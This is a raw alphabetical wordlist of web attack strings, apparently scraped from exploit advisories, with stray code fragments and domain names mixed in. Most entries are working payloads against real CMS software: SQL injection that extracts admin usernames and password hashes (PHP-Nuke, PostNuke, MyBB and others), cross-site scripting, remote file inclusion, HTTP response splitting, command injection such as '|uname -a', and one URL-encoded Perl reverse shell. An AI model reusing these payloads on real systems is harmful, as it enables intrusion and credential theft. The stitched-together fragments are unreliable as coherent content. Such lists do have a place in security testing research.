modules.php?name=Bookmarks&file=uploadbookmarks&category=[htmlcode] 
modules.php?name=Calendar&file=index&type=view&eid=-99%20UNION%20ALL%20SELECT%201,1,aid,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_authors%20WHERE%20radminsuper=1
modules.php?name=Content&pa=showpage&pid=2) ; 	 #
modules.php?name=Content&pa=showpage&pid=7) ; 	 #
modules.php?name=coppermine&file=searchnew&startdir=..
modules.php?name=Downloads
modules.php?name=Downloads">
modules.php?name=Downloads&d_op=getit&lid=-1%20UNION%20
modules.php?name=Downloads&d_op=getit&lid=2%20<our_code>
modules.php?name=Downloads&d_op=getit&lid=3 ;				 #
modules.php?name=Downloads&d_op=getit&lid=4
modules.php?name=Downloads&d_op=getit&lid=8 ;				 #
modules.php?name=Downloads&d_op=getit&lid=975
modules.php?name=Downloads&d_op=modifydownloadrequest&
modules.php?name=Downloads&d_op=ns_getit&cid=14&lid=156&type=url#get*
modules.php?name=Downloads&d_op=rateinfo&lid=-1%20UNION%20
modules.php?name=Downloads&d_op=viewdownload&cid=1
modules.php?name=Downloads&d_op=viewdownload&cid=-1%20
modules.php?name=Downloads&d_op=viewdownload&cid=2
modules.php?name=Downloads&d_op=viewdownload&cid=6 
modules.php?name=Downloads&d_op=viewdownloadcomments&
modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1
modules.php?name=Downloads&op=getit&lid=6
modules.php?name=Downloads&op=search&query=><script>alert('ARIA')<
modules.php?name=Encyclopedia&file=search\r\n";
modules.php?name=Forums&file=posting");
modules.php?name=Forums&file=viewtopic&t=1&highlight=%2527.printf%252820041315%2529.%2527");
modules.php?name=Forums&file=viewtopic&t=".$t."&highlight=%2527.printf%252820041315%2529.%2527");
modules.php?name=gallery&files=
modules.php?name=guestbook&file=index
modules.php?name=Journal&file=commentkill&onwhat=1
modules.php?name=Journal&file=display&jid=".$jid[0]);
modules.php?name=Journal&file=display&jid=".$jid[1]);
modules.php?name=Journal&file=edit");
modules.php?name=Journal&file=savenew");
modules.php?name=Journal&file=savenew&title=f00bar
modules.php?name=Journal&file=search&bywhat=aid&exact=1
modules.php?name=Members_List&&sql_debug=1
modules.php?name=News&file=article&sid=1234%20or%
modules.php?name=News&file=article&sid=1&save=1&mode=',user_level='4
modules.php?name=News&file=article&sid=1&save=1&order=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'
modules.php?name=News&file=article&sid=1&save=1&order=',user_level='4
modules.php?name=News&file=article&sid=1&save=1&thold=',user_level='4
modules.php?name=News&file=friend&op=StorySent&title=%253cscript>alert%2528document.cookie);%253c
modules.php?name=News&file=print&sid=
modules.php?name=News&file=print&sid=-1+union+select+1,2,pwd,aid,5,6,7+from+nuke_authors--
modules.php?name=News&file=print&sid=[Any_Text]
modules.php?name=News&op=rate_complete&sid=6&score=[insert ur code here]
modules.php?name=NukeJokes&file=print&jokeid=-1
modules.php?name=Photo_A_Day&action=single&pad_selected=44%20UNION%20SELECT%20< script>alert(document.cookie);<
modules.php?name=Private_Messages&file=index&folder=inbox&user=eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsMSwxLG51bGwvKjox
modules.php?name=Private_Messages&op=send
modules.php?name=Rapidshare
modules.php?name=Release
modules.php?name=Reviews&rop=postcomment&title=%253cscript>alert%2528document.cookie);%253c
modules.php?name=Reviews&rop=Q&order=[sql injection code here]
modules.php?name=Reviews&rop=savecomment&id=1&uname=f00bar&score=999999999999999999999999 
modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20
modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=f00@bar.org&text=f00%253c
modules.php?name=<script>alert(document.cookie)<
modules.php?name=Script_Preview&script=12
modules.php?name=Search
modules.php?name=Search:
modules.php?name=Search and type in
modules.php?name=Search_Enhanced>
modules.php?name=Search&file=..
modules.php?name=Sections">
modules.php?name=Sections&op=listarticles&secid=-1%20UNION
modules.php?name=Sections&op=printpage&artid=-1%20UNION%20
modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20
modules.php?name=Shopping_Cart&file=category&category_id=4+uNioN+sElEcT+'IQ-SecuritY',aid,pwd+from+nuke_authors--
modules.php?name=Surveys&op=results&pollID=5+and+1=2+union+select+1,version%28%29,3,4--
modules.php?name=Surveys&op=results&pollID=+and+substring(@@version,1,1)=5#
modules.php?name=Surveys&op=results&pollID=[INDONESIANCODER]
modules.php?name=Surveys&op=results&pollID=[SQL]
modules.php?name=Surveys&pollID=1&forwarder=%0d%0a%0d%0a%3Chtml%3EHELLO AM VULNERABLE TO HTTP RESPONSE SPLITTING%3C
modules.php?name=Surveys&pollID=a'[sql_code_here] 
modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1
modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
modules.php?name=Web_Links
modules.php?name=Web_Links&l_op=Add&url=sql Injection
modules.php?name=Web_Links&l_op=brokenlink&lid=0%20UNION
modules.php?name=Web_Links&l_op=modifylinkrequestS&url='[SQL]
modules.php?name=Web_Links&l_op=MostPopular&ratenum=%3Ch1%3E50&ratetype=num
modules.php?name=Web_Links&l_op=MostPopular&ratenum=[SQL]&ratetype=num 
modules.php?name=Web_Links&l_op=search&query=sex&orderby=[SQL]&min=[SQL]&show=[SQL]
modules.php?name=Web_Links&l_op=viewlink&cid=0%20UNION%20SEL
modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20
modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20
modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1
modules.php?name=Web_Links&l_op=viewlink&orderby=[SQL]&min=[SQL]
modules.php?name=Web_Links&l_op=visit&lid=-1%20UNION%20
modules.php?name=WorkBoard&file=project&project_id=
modules.php?name=Work_Board&op=Task&task_id=
modules.php?name=$xploit&file=article&sid=2";
modules.php?name=(xxx subject)&(subject)=exploit
modules.php?name=Your_Account" method="post">
modules.php?name=Your_account&mod_file=..
modules.php?name=Your_Account&op=avatarlist
modules.php?name=Your_Account&op=userinfo&
modules.php?name=Your_Account&op=userinfo&uname= 
modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,aid,2,null,null,null%20FROM%20nuke_authors
modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,pwd,2,null,null,null%20FROM%20nuke_authors
modules.php?op=modload&name=books&file=index&req=search&query=
modules.php?op=modload&name=books&file=index&req=view_cat&cid= {exploit}
modules.php?op=modload&name=CWGuestBook&file=index&req=viewrecords&rid=-14 UNION SELECT 1,pn_uname,pn_pass,pn_email,5,pn_uid,7,8,9 FROM md_users WHERE pn_uid=2--
modules.php?op=modload&name=Downloads&file=index&req=addrating&ratinglid=[DOWNLOAD ID]&ratinguser=[REMOTE USER]&ratinghost_name=[REMOTE HOST ;-)]&rating=[YOUR RANDOM CONTENT] 
modules.php?op=modload&name=Downloads&file=index&req=viewdownloaddetails&lid=2&ttitle=%3Cscript%3Ealert(document.location)%3C
modules.php?op=modload&name=FAQ&file=index&myfaq=yes&i
modules.php?op=modload&name=Forums&file=attachment&AtchOp=show
modules.php?op=modload&name=Forums&file=viewforum&forum='%20OR%201=1%20INTO%20OUTFILE%20'[
modules.php?op=modload&name=Forums&file=viewtopic&topic=1&forum=1'%20INTO%20OUTFILE%20'[path
modules.php?op=modload&name=Glossary&file=index&page=`[SQL QUERY] 
modules.php?op=modload&name=Kalender&file=index&type=view&eid=-1%20UNION%20select%20null,aid,null,pwd,null,null,null,null,null,null,null,null%20%20FR
modules.php?op=modload&name=Kalender&file=index&type=view&eid=foobar
modules.php?op=modload&name=Members_List&file=index&letter=All&sortby=uname1234
modules.php?op=modload&name=Messages&file=bbcode_ref&sitename=<
modules.php?op=modload&name=Messages&file=bb_smilies&sitename=<
modules.php?op=modload&name=News&file=article&sid=
modules.php?op=modload&name=News&file=article&sid=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users--
modules.php?op=modload&name=News&file=article&sid=1&catid='cXIb8O3
modules.php?op=modload&name=News&file=article&sid=[SQL]
modules.php?op=modload&name=News&file=article&sid='SQL_INJECTION&POSTNUKESID=355776cfb622466924a7096d4471a480 
modules.php?op=modload&name=News&file=index&catid=[sql]
modules.php?op=modload&name=News&file=index&catid=[SQL]
modules.php?op=modload&name=News&file=index&catid=&topic=>
modules.php?op=modload&name=News&file=index&catid=&topic=18&startrow=[sql]
modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=0&catid=-99999%20UNION%20SELECT%20pn_uname,pn_uname,pn_
modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=73+and+substring(@@version,1,1)=5# [work]
modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=[SQL]
modules.php?op=modload&name=phprofession&file=index&offset=foobar
modules.php?op=modload&name=SPChat&file=chooser&youruid=0+UNION+SELECT+pwd,2,3,4,5,6,7,8+FROM+nuke_authors+LIMIT+0,1
modules.php?op=modload&name=SPChat&file=chooser&youruid=[SQL Injection]
modules.php?op=modload&name=Stats&file=
modules.php?op=modload&name=subjects&file=print&print=<script>alert('LOL')<
modules.php?op=modload&name=WebChat&file=index&roomid=Non_Numeric
modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink
modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=2%20<our_code>
modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=[any_words]
modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert(document.cookie)<
modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=..
modules.php?uninstall=..
modules.php?view=0&name=Content
modules.php?view=0&name=downloads&file=index&d_op=ratedownload&lid=
modules.php?view=0&name=Folder Name&file=File Name
modules.php?warp=artikel&group=&seite=&id=[SQL]
modules.php?warp=artikel&group=&seite=[SQL]
modules.php?warp=artikel&group=[SQL]
module=user&norm_user_op=login&block_username=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP
module_wrapper.asp?wrap_script=1' and 1=convert(int,@@version)--
module_wrapper.asp?wrap_script=[sql]
moduli
modul.inc.php?modul=..
modulistica
/?modul=niusy&id=61[Sqli]
moduls
moduly
mod_upgrade_funcs.php?MOA_PATH=[AvriLhea]          
mod_user_funcs.php?MOA_PATH=[AvriLhea]          
mod.users.php?thCMS_root=[evilc0de]
/?mod=view_default&id=68[SQLi]
mod_virtuemart_currencies
mod_virtuemart_currencies.xml")
modvisitordata-joomla-remoce-code.html
mod_visitorsgooglemap
modx-0.9.6.1
modx-0.9.6.2
[modx_dir]
mog_product
mohsen
mohshow.fr.cr
moin
moinexec.py" % target, cookies=jar)
moinexec.py" % (target, ticket_hash)
moin.wsgi" % target, cookies=jar)
moin.wsgi" % (target, ticket_hash)
/?mois=&annee=&date=[sql]
mojoblog
momche.net
mome
monalbum
monatsblatt.php?kal_class_path=[INDONESIANCODER]
mongoose
monitor
monoray.net
[month]
&month=1<
month-date-year-time-minute-pm
month.php?area=1
month.php?cid=&catid=[SQL]
month.php?cid=[SQL]
month.php?gfplugins=[Shell]
month.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1
&month=<script>
monthview.jpg
*&mood=1&status=".urlencode("no',(select aid from nuke_authors limit 1),(select pwd from nuke_authors limit 1))-- 1")."&submit=Add+New+Entry";
moodle
moodle';
moodle-2-account-takeover
moodledata
moodle-joomla
moodle.org
*&mood=".urlencode("'*
morcegocms
more-0day-wordpress-security-leaks-in-firestats.html
moregroupware
moreinfo.php
moreinfo.php?pg=4&itemno=122-20'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,+concat(0x3a,user,0x3a,pass)+FROM+admin--+AND+'GNK'='GNK&catid=11
more-news.php?id=-16
more-news.php?id=[inj3ct C0dE]
Mormoroth }
mormoroth.ir }
mostviewed.php?pid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7
mostviewed.php?prid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7
mostvoted.php?pid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7 
mostvoted.php?prid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7
mos_users
mos_users limit 0,1),1,1))>96		
mos_users limit 0,1),1,1))>97
motd%00
motif_cni.class.php?path_om=[Shell]
motif_retour.class.php?path_om=[Shell]
*&mots=%20&where=description
mouth
move
move_messages.php?msg=1&mailbox=[file_you_want_to_move]&startMessage=1&targetMailbox=[target_mailbox_here]
move.php?GlobalSettings[templatesDirectory]=[evil_script]
moviebase
moviedetails.php?usersession=&user_id=[sql]&movie_id=312 
movies
Movies Library
movies_script.html
movm-mobile-virtuemart-site-demo
mozi.rootmybox.org
mp3
mp3s
mp3SDS
mp3SDS-3.0.tgz
mp3toolbox
mpcs
mpdf
mpdf53
[mPDF URL] <file_to_read>
m.php?data=eJxLtDK0qi62srBSyiqOT8xJLSpRsi62Mra0UrLRz8svTi7KLCixs4HSYHkNQyNjTWsbfaiYknUtAP1BFmU
m.php?data=QlpoNDFBWSZTWcu%2fgEMAAA%2bbgBBguH0AAKo13AogAFRQAAADIGVNNNGmZIMBGEgGPQOa%2flg2jGWBuiGSqXfdt1NRk8QHt7GpsF8DBGJPFBvxdyRThQkMu%2fgEMA
mpm.pahviloota.net
mpnews.ini 
MPS
MPS.html
mrbs
MrPteo
ms4w
MS_Analysis
msgbrd2
msg.php-afs-1-"
msg.php?id=-1
msgs
msnbot.htm)",
msnbot.htm)";
msnbot.htm)\r\n";
ms-pe02
msp.php?gfwww=[Shell]
msproject
/?m=[SQL]
mt
MTBlackList.Examine.class.php?_CONF[path]=[Evil_Script]
mtcms.co.uk
mtp_guestbook
mt.php?web_root=[shell]
mts
mt_srand-and-not-so-random-numbers
mu
mujecms
multi
multiauktionV3
multicart
multicart)<
multihost
multi.html
multimedia
multimedia.mydlstore.net
multimedia-players
Multi-Mirror
multiplechoice
multiple-file-attachments-mail-form-prov2
multiple_path_disclousure_in_4images.html
multiple_sql_injection_in_ajax_category_dropdown_wordpress_plugin.html
multiprint
mundimail
munimartin.at
munky
musa.php?" 
music
musicbox
musicgallery
music.php?music_id=292+and+substring(@@version,1,1)=4 False		    |
music.php?music_id=292+and+substring(@@version,1,1)=5 True		    |
music.php?music_id=[sql]				 	 			    |
music&search=1%27&playlist_id=&playlist_id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12
music_song
muslimonline.org
musoo
Musoo
Musoo-Video.rar
muster.html 
mu.wordpress.org
mvcnphp
mvcw_conver.php?step=1&vwar_root=http
mvcw_conver.php?step=1&vwar_root=[shell]
mvcw.php?step=1&vwar_root=http
mvcw.php?step=1&vwar_root=[shell]
mvnforum
mwcal
mwchat
mwenhanced
mwguest
mwguest.php
mxBB
mx_glance_sdesc.php?mx_root_path=[ShellCode]
mxml" creationComplete="onAppInit()">
mx_newssuite
mx_pafiledb
MXShop
mx_smartor
my123tkshop
my_account
myAccount"
my_account.php?action=getpage&page=..
my_account.php?action=getpage&page=edit_profile&type=other\r\n'
myAccount" % rhost)
my_admin
myAds
myagenda.php?coursePath=%3E%3Cscript%3Ealert(document.cookie)%3C
myalbum
MyAnnonces
myannu.fr
myarticles
MyBace_Light_(hauptverzeichniss)_Remote_File_Inclusion.htm
mybb
myBB
mybb -1
mybb.1.2.10
mybboard.it
mybbpath
mybb.ru
mybb_users
mybizz
myblog
mybloggie
myBloggie
mybloggie213beta
[MYBLOGGIE-DIRECTORY]
my_blogs
myblog_users
mybonus.php" method="post">
mybooks.php?home=[SHELL]
MYBOX
mybusinessadmin
mycard
mycare2x_importer.php?sid=6dlskul290sc3dg2ab0mlpa0a3&lang=de&fid=800000101&pid=-1%27[SQL-Injection!]&dept_nr=11
mycare2x_importer.php?sid=6dlskul290sc3dg2ab0mlpa0a3&lang=de&fid=800000101&pid=596&dept_nr=-1%27[SQL-Injection!]
mycare2x.net
mycare2x_pat_info.php?sid=moq09jafqbl4leasdpvcl7qi56&lang=-1%27&aktion=-1%27[SQL-Injection!]
mycare2x_pat_info.php?sid=moq09jafqbl4ledgppvcl7qi56&lang=de&aktion=[Cross Site 
mycare2x_pat_info.php?sid=moq09jafqbl4ledgppvcl7qi56&lang=de&aktion=|PRI|AVE|FLB|&callurl=[Cross
mycare2x_proc_search.php?myAction=Suchen&myOpsEintrag=-
mycare2x_proc_search.phpmyAction=Suchen&myOpsEintrag=1
mycare_pid.php?pid=&ext_pid=&date_reg=2012-04-19+06%3A00%3A00&pat_type=
mycare_pid.php?pid=&ext_pid=&date_reg=&pat_type=Self&panel=1&title1=&title=&name_last=-
mycare_pid.php?pid=[SQL-Injection!]
mycare_ward_print.php?sid=moq09jafqbl4ledgppvcl7qi56&lang=[Cross Site 
mycare_ward_print.php?sid=moq09jafqbl4ledgppvcl7qi56&lang=de&favorites=[Cross Site 
mycars
my-category-order
myclientbase
my.cnf', '
mycode&action=xmlhttp_test_mycode");
my-comments-display-tpl.php?language_file=[evilcode]
mycompany
mycontacts.php?membername=putausername 
mycrocms
[mycrocms_path]
mydesk.edit.php',{'action':'updateuser','password':'123456','repassword':'123456','email':'admin@localhost.com','userfullname':'','usercompany':'','useraddress':'','userpostcode':'','usertel':'','userfax':'','useronline':'','userwebsite':''});
mydms
my_download_jw82ku0jz9_43.php
mydownloads
mydyngallery.mon-cottenchy.fr                                    #
My-eGallery-dev-8113.html
myfirstcms
myflash
myflash-button.php?wpPATH=Shl3?
myforms
MyFWB
myfwb.co.cc
my_gallery
myheader.php?url=javascript:alert(document.cookie);
myheader.php?url="><script>alert(document.cookie)<
myhome.php?action=readmsg&id=1[SQL CODE] 
myhome.php?action=readmsg&id=[message_id]&box=inbox
my.host
myhtml.php?GLOBALS[page]=..
my-images
MyInfo.aspx?member_id=10&
MyInfo.aspx?p_Record_member_id=1&Record_member_id=1&Record_name=admin&Record_member_password=newpass&Record_email=moo&Record_location=&Record_home_phone=&Record_work_phone=
my_info.inc.php?install_root=[Shell]
my.ini%00
mykdownload.php
myl2jdropcalc.htm
myLDlinker.php?url=18[SQLi]
mylinks
mylittleforum.net
mylook
myMailer.class.php?mosConfig_absolute_path=[evilcode]  |
[MyMail_path]
mymarket
mymarket.sourceforge.net
myminibill
my_MM
MyMsg_1.0.3
my_newpost.php?fmid=-1 union select [SQL-INJECTION]--
mynews
MyNews
mynewsgroups.sourceforge.net
mynews.inc.php?hash=cce496a942d7279c14d7da556c14c7b6&mnid=2&page="><script>alert(
mynews.inc.php?hash="><script>alert(
myolympus.org
my_orders.php?action=status&orderid=-68+union+select+1,2,3,adminpassword,5,6,7,8,9+from+tblgeneral
my_orders.php?action=status&orderid=-68+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9--
my_orders.php?action=status&orderid=-68+union+select+1,2,3,username,5,6,7,8,9+from+dbminibill.tblorders+limit+0,1
MyPage.do?method=viewDashBoard&forpage=1&
MyPage.do?method=viewDashBoard&forpage=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL
mypage.php?id=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Cphpbb_users.user_id%2C0x5e%2Cphpbb_users.user_type%2C0x5e%2Cphpbb_users.group_id%2C0x5e%2Cphpbb_users.username%2C0x5e%2Cphpbb_users.user_password%2C0x27%2C0x7e%29+from+%60forum_domperm%60.phpbb_users+limit+5%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271
mypage.php?id= (SQL)
mypage.php?trg=1142+and+1=2+union+select+1,2,3,user(),concat(0x3a,database()),6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23,24,25,26,27,28--
 mypassword """
mypbs
mypbs 
my_photo)
my.php
MyPhpAuction-2010.html
myphpcalendar
myphpcalendar.sourceforge.net
myphpcms
[myphpcms_path]
myphpcommander
my.php?func=email&pwdEmail=bbb@aa.com',edit='Y'%00
myphpim
myphpindexer
myphpnuke
my.php?sort_mode=[SQL] 
myportal
myprofile
my_profile.html
myprofile.php
my_progress.php?course=-999'         	# 
my-projects
myrents.php?home=[LFI]
myreview.lri.fr
mysar
mysave.php?file=[shell]
MySBB
myschool
myseat
MYSERVER
my.shell.fi
myshell.php
myshop
myshop_start.php?APPID=2&PRID= SQL INJECTION 
myshop_start.php?APPID=2&PRID=sql[N.A.S.T ]
myshop_start.php?APPID='><script>alert(document.cookie)<
[my_simple_forum_path]
MySimpleForum_v.7.1
mysite
my.slow.ccu.edu.tw
MySms
mysql
MySQL
MySql-AJAX-Poll-script-with-pie-and-bar-graph
mysql-and-sql-column-truncation-vulnerabilities
mysqlCall.inc.php?config=[evil_script]
mysqlCall.inc.php?config=[file] 
mysql.class
mysqlconfig.php
mysqlconfig.php?fantasticopath=
MySQLController.php?baseDir=[evilcode]
mysql.inc
mysql.php
MySQL program that takes the best of wiki software and combines it with the best of web content management systems (CMS).
mysql.user
mysql.user--
mysql.user&mytable=test_category
mystat
mystat.php?act=stat_img&d1=1&d2=-1') AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
mystatus
my-story.org
mytabs
mytickets
mytribiqsite
myuploadedfile
MyWebsiteImages
myweb.tiscali.co.uk
myyoutube
n
>\n";
              |\n";
                       |\n";
                                |\n";
                                               |\n";
                        \n");
                   +\n";
             -\n".
       -+-\n";
    -\n".
 -\n".
 ]== |\n";
 \n";
 \n");
 \n"); 
 ##\n";
'."\n");
):                  \n ";
)\n";
]\n";
*\n";
\">\n"
\"\n";                                                                                    
\n"
\n";
\n"; 
\n".
\n");
n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
n0ssy
n0xxf.jpg
n1.127.0.0.1:1338
n13
  N-13 News
N-13 News 4.0
nabopoll
nachrichtenmann.de
nacoma
nagiosql
[nagiosQL_path]
Nakid%20CMS%20v_0_5_2.rar
nakidcms
nalozi_naslov.php?fin_nalog_id=140&config=alert(1);
nalozi_naslov.php?fin_nalog_id=140[SQLi]&config=default
", $name)) {
$name<
name,1
named.conf%00
Name File
name of file	 
[name of file without .php]
[name of file wthout php]
[name].php 
$name.php.wmv
name your file
nano
nanobb.sourceforge.net
nansec
narcissus
nasty
nattechat
natterchat
nature.class.php?path_om[Shell]
navbar.php
navBar.php', filling in the
navboard
navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=-63
navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=63[SQLi]
navigation
navigation.inc.php
navigation.php?FSPHP_LIB=[evilc0de]
navigation.php?path=..
navigator
navlinks.php?op=edit&nav_id=9''+Union+Select+version(),2,3--%20-#
nav.php3?page=[code] 
nav.php (Admin Panel)
nav.php?INCDIR=[evil_scripts]
nazarkin.name
NB-Clean
nbd.js">, and when the commentee visits usercp.php
" nboctettoreadinheap [repeat
nc4hk.swf\",\"r\");$b=\"\";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen(\"
ncaster
nchc.dl.sourceforge.net
ncms
nconf
ndetail.php?id=[SQL1]
ndex.php?id=-99 union select null,null,null,null,null,null,null,null,null from newsphp.pro
ndex.php?option=com_soundset&controller=showcategory&cat_id=[INDONESIANCODER]
neat_users
neat-web
nederlands
nensor-cms
neobill
neobill.127.0.0.1:1339
neocrome.net
neosecurityteam.net
neosecurityteam.tk
nephp
nesgame
NestedSet
NestedSet.php?driverpath=[EV!L]
net
netartmedia.net
netbutik1
netbutik2
netbutik3
netbutik4
netbutik.php?cat=-1+union+select+concat_ws(0x3a3a,brugernavn,adgangskode)+from+netbutik1_brugere
netbutik.php?cat=-1+union+select+concat_ws(0x3a3a,brugernavn,adgangskode)+from+netbutik2_brugere
netbutik.php?cat=-1+union+select+concat_ws(0x3a3a,brugernavn,adgangskode)+from+netbutik3_brugere
netbutik.php?cat=-1+union+select+concat_ws(0x3a3a,brugernavn,adgangskode)+from+netbutik4_brugere
netcat
netcat.ru
netcat.sourceforge.net
netcmd.php?cmd=nmap&query=|uname -a    
netdevilz ?
Net_DNS-0.03.tgz
netforo
nethoteles
netious
[netlink_path]
net-ninja.net
netofficedwins
netpet
[netref_folder]
netref.net
netrisk
netserv.ncesd.org
netsparker
netsparker-advisories
nettools.php";
networkmap&refr=0&layout=1;id;
networkmap&refr=0&layout=1;uname%20-a;
networktracker.org
networx-social
neuheiten
new
New_5Star.html
NewAccountPage.class.php?base_path=[evil_scripts]
newarticle
new.asp?id=1+union+select+0+from+adminpassword
newbb
newbb_plus
..",$newc);
newcards.php?page=1<script>alert(+213771818860)<
new_cats.php" method="POST">
newcms
newcomment
newcomment?ArticleId=">&lt;script&gt;alert('hi')&lt;
NewDomainServicePage.class.php?base_path=[evil_scripts]
newdownlinebuilder
newentry.php?message=<script>alert(document.cookie);<
/?newestmemberrecords[][username]=war<?php+phpinfo();?>axe
newest.php?theme_dir=..
new_event.php">
newfaq
" . $newfile . "\r\n";
newhack.org
newhack.org ]
newhostgroupform.php?name=' union select
new_images.php?order=foo
new_item.inc.php?install_root=[Shell]
newmail
newmsg.php?fid=''%20UNION%20SELECT%20nick,%20password,%20null,%20null%20FROM%20[table_pr\efix]users%20
newmultiplechoice.php?edit=1&editfile=..
newpage.html?originalpageid=%22%3E%3Cscript%3Ealert('r0t')%3C
newpage.php
newpage.php?message=<script>alert(document.cookie);<
newpages.php?id=[id]
new.php
new.php?edit={SQLi
new.php?id=-9+union+select+1,password,3,4+from+admin
new.php?id=-9+union+select+1,user_name,3,4+from+admin
new.php?site_path=[Shell]
newpm.php?templatefolder=[file]
newpod
newpoll
newpoll.php?ques=1%27
newpost.php?a=1&t=1&page=1", $cookie, $expPost);
newpost.php?id=1&t=1&t_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C
newpost.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C
newpost.php?sub=newthread&fid=[code] 
NewProductPage.class.php?base_path=[evil_scripts]
newreply.php?ajax=1
newreply.php" name="vbform"
newreply.php?tid='[sql_query]
news
news ]
news.
news\
News
news_149_MemHT-Portal-4-0-2.html
/?news=1+and%20%28select%20substring%28concat%281,password%29,1,1%29%20from%20admin%20limit%200,1%29=1
/?news=1+and%20%28select%20substring%28concat%281,username%29,1,1%29%20from%20admin%20limit%200,1%29=1
/?news=1+and substring(@@version,1,1)=4 --> False
/?news=1+and substring(@@version,1,1)=5 --> True
/?news=1[BSQLi]
news1.shtml?id=-1+union+select+1,2,3,4
news%20manager
news2net
newsadd
newsadd--mysql
news-and-blog
news-announcements-f2-scripteen-free-image-hosting-script-v2-3-t631.html
news_any_id=12+union+select+1,2,3,4,5,concat_ws(0x3a,user,pass),7,8+from+supernews_login--
newsarchive.php?post=-1
newsarticle.php?id=10 and 1=1 [and 1=2]
news.asp
news.asp?id=412+union+select+1,2,username,pw,5,6,7,8,9,10,11+from+adminpassword
newsboard
newsboard.unclassified.de
news_body.php?id=[sqli]
news_body.php?news_id=65 union select 1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12 from users
news_cats.php?
News?&CB=CB1&fileDN=mnF%3
news_class.php?GLOBALS[where_framework]=[cmd_url]
NewsCMS
news_content.php?id=9[CODE]
newscoop
Newscoop-355-and-Newscoop-4-RC4-security-releases.htm
newscript
news_data
newsdb
news_desc.html?id=6'
news_desc.php?id=1[SQL]
news_desc.php?id=-4+union+select+1,concat(username,0x3a,password),3,4,5+from+sblnk_admin--
newsdesk
newsdetail1.php?id=[sqli]
news_detail.asp?id=1+union+select+1,2,3,f_user,f_password,6,7,8+from+upass%00
news_detail.asp?id=1+union+select+1,2,f_user,4,5,f_password,7,8,9,10,11,12,13+from+upass%00
newsdetail.php?id=-12+union+select+1,password,3,4,5,6,7+from+zagrosle_zagros.user_accounts>--
newsdetail.php?id=-12+union+select+1,user_name,3,4,5,6,7+from+zagrosle_zagros.user_accounts>--
news_detail.php?id=[INDONESIANCODER]
newsdetail.php?news_id=[SQL]
newsdetail.php?NID=-1+union+select+1,2,3,4,5+from+News
newsdetail.php?NID=-1+union+select+News_date,news_id,3,news_date,5+from+News
news_detail.php?nid=-2+UNION%20SELECT%201,2,3,password,5,6,7+from+admin--
news_detail.php?nid="><script>alert(document.cookie)<
news_details.php?id=-1+union+select+1,2,3,group_concat(name,0x3a,password),5,6,7+from+tbl_members
news_details.php?news_id=[BLIND SQLi]    1
news_details.php?sec_id=[BLIND SQLi]     1
NEWSEARCH.php?whatdoreplace=whatdoreplace%00<script>alert(document.cookie)<
